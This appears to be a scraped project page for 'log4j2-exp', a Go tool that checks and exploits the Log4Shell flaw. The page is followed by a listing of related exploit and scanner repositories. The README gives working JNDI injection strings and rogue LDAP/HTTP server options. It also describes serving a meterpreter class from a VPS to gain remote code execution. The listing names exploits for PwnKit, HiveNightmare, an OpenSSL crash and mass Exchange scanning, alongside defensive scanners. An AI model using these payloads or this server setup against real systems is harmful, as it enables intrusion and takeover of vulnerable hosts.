Check and exploit log4j2 vulnerability with single Go program.

Overview

log4j2-exp

  • Check and exploit log4j2 vulnerability with single Go program.
  • You don't need to install anything except develop it.
  • It supports ldaps and https server for other usage.

Run

log4j2-exp.exe -host "VPS IP address"

Check

  • run the log4j2-exp server
  • send ${jndi:ldap://127.0.0.1/nop.class}

Exploit

  • run the log4j2-exp server
  • put your class file to the payload directory
  • send ${jndi:ldap://127.0.0.1/meterpreter.class}
  • will open source after some time

VulApp

  • VulApp is a vulnerable Java program that use log4j2 package.
  • You can use it for develop this project easily.
  • java -jar vulapp.jar ${jndi:ldap://127.0.0.1/calc.class}

Help

:::        ::::::::   ::::::::      :::   ::::::::::: ::::::::
:+:       :+:    :+: :+:    :+:    :+:        :+:    :+:    :+:
+:+       +:+    +:+ +:+          +:+ +:+     +:+          +:+
+#+       +#+    +:+ :#:         +#+  +:+     +#+        +#+
+#+       +#+    +#+ +#+   +#+# +#+#+#+#+#+   +#+      +#+
#+#       #+#    #+# #+#    #+#       #+# #+# #+#     #+#
########## ########   ########        ###  #####     ##########

                         https://github.com/For-ACGN/log4j2-exp

Usage of log4j2-exp.exe:
-host string
      server IP address or domain name (default "127.0.0.1")
-http-addr string
      http server address (default ":8080")
-http-net string
      http server network (default "tcp")
-ldap-addr string
      ldap server address (default ":389")
-ldap-net string
      ldap server network (default "tcp")
-payload string
      payload(java class) directory (default "payload")
-tls-cert string
      tls certificate file path (default "cert.pem")
-tls-key string
      tls private key file path (default "key.pem")
-tls-server
      enable ldaps and https server

Screenshot

Releases(v1.0.4)
Owner
鹫尾须美
一名路过的普通高中生。          通りすがりの普通高校生だ。        A passing ordinary high school student.
鹫尾须美
Tool to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228

log4shell.tools log4shell.tools is a tool allows you to run a test to check whether one of your applications is affected by a vulnerability in log4j:

Alexander Bakker 57 May 26, 2022
Exploit for HiveNightmare - CVE-2021–36934

HiveNightmare this is a quick and dirty exploit for HiveNightmare (or SeriousSam) - CVE-2021–36934 This allows non administrator users to read the SAM

Christian Mehlmauer 56 Jun 14, 2022
CVE-2021-3449 OpenSSL denial-of-service exploit 👨🏻‍💻

CVE-2021-3449 OpenSSL <1.1.1k DoS exploit Usage: go run . -host hostname:port This program implements a proof-of-concept exploit of CVE-2021-3449 affe

Richard Patel 218 Jun 15, 2022
Exploit for remote command execution in Golang go get command.

CVE-2018-6574 Exploit for remote command execution in Golang go get command. Introduction When you go get a package, Go is designed to build and insta

Devang Solanki 0 Oct 15, 2021
Application trying to detect processes vulnerable to log4j JNDI exploit

Log4j JNDI Jar Detector Purpose This application is able to detect jars used by

Criteo 4 Jan 25, 2022
Dlink-exploit - Dlink leaked by drix

dlink-exploit dlink leaked by drix. NOTE:EDUCATION ONLY aboout me: discord:Drix#

Drix.sh 1 Jan 9, 2022
A pure-Go implementation of the CVE-2021-4034 PwnKit exploit

go-PwnKit A pure-Go implementation of the CVE-2021-4034 PwnKit exploit. Installation git clone [email protected]:OXDBXKXO/go-PwnKit.git cd go-PwnKit make

null 4 Mar 2, 2022
A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855).

proxylogscan This tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and imperson

dw1 139 Jun 12, 2022
Nuclei is a fast tool for configurable targeted vulnerability scanning based on templates offering massive extensibility and ease of use.

Fast and customisable vulnerability scanner based on simple YAML based DSL. How • Install • For Security Engineers • For Developers • Documentation •

ProjectDiscovery 8.7k Jun 26, 2022
A vulnerability scanner for container images and filesystems

A vulnerability scanner for container images and filesystems

Anchore, Inc. 4k Jun 24, 2022
Scans and catches callbacks of systems that are impacted by Log4J Log4Shell vulnerability across specific headers.

Log4ShellScanner Scans and catches callbacks of systems that are impacted by Log4J Log4Shell vulnerability across specific headers. Very Beta Warning!

null 56 Jun 17, 2022
Scanner to send specially crafted requests and catch callbacks of systems that are impacted by Log4J Log4Shell vulnerability (CVE-2021-44228)

scan4log4shell Scanner to send specially crafted requests and catch callbacks of systems that are impacted by Log4J Log4Shell vulnerability CVE-2021-4

Frank Hübner 11 Feb 27, 2022
Detect and fix log4j log4shell vulnerability (CVE-2021-44228)

log4fix This tool is to detect and fix the log4j log4shell vulnerability (CVE-2021-44228) by looking and removing the JndiLookup class from .jar/.war/

Nanitor 11 Apr 8, 2022
Discover and remediate Log4Shell vulnerability [CVE-2021-45105]

sakuraji_log4j This tool is used to discover and remedidate the Log4Shell vulnerability [CVE-2021-45105] by removing the 'JndiLookup.class' file from

Sakuraji 1 Dec 28, 2021
A vulnerability scanner for container images and filesystems

A vulnerability scanner for container images and filesystems. Easily install the

null 0 Dec 24, 2021
A fast tool to scan CRLF vulnerability written in Go

CRLFuzz A fast tool to scan CRLF vulnerability written in Go Resources Installation from Binary from Source from GitHub Usage Basic Usage Flags Target

dw1 725 Jun 27, 2022
Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language libraries, Network devices

Vuls: VULnerability Scanner Vulnerability scanner for Linux/FreeBSD, agent-less, written in Go. We have a slack team. Join slack team Twitter: @vuls_e

Future Corp 9.3k Jun 24, 2022
The Go Vulnerability Database

The Go Vulnerability Database golang.org/x/vulndb This repository is a prototype of the Go Vulnerability Database. Read the Draft Design. Neither the

Go 369 Jun 23, 2022
Super Java Vulnerability Scanner

XiuScan 不完善,正在开发中 介绍 一个纯Golang编写基于命令行的Java框架漏洞扫描工具 致力于参考xray打造一款高效方便的漏扫神器 计划支持Fastjson、Shiro、Struts2、Spring、WebLogic等框架 PS: 取名为XiuScan因为带我入安全的大哥是修君 特点

4ra1n 116 Dec 30, 2021